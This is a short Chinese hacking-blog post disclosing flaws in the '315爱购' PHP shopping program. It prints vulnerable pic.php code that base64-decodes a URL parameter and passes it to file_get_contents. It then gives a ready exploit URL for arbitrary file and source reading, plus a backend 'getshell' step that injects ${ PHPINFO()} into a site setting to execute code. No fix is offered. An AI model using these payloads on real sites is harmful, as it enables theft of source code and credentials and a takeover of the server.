当前位置: iick's blog > 技术文章 > 315爱购程序任意文件源码查看

315爱购程序任意文件源码查看

作者:hack1990 时间:12-07-18 阅读数:565人阅读

pic.php

function url_base64_decode($code)
{
        if($code=="")
                return "";
    $code=str_replace("!",'+',$code);
    $code=str_replace(",",'/',$code);
    $str=base64_decode($code);
    return $str;
}
$url=url_base64_decode($_GET["url"]);
//....省略
header("Content-type: image/jpeg");
echo file_get_contents($url);exp:http://site/pic.php?url=aW5kZXgucGhw

后台GETSHELL

系统基本参数->网站所在目录:->${ PHPINFO()}

 

# Nmap Security Scanner 7.0

上一篇:KindEditor 3.5.2~4.1 鸡肋上传重命名改名拿WebShell漏洞

下一篇:B2Bbuilder php SQL inj

相关文章

发表评论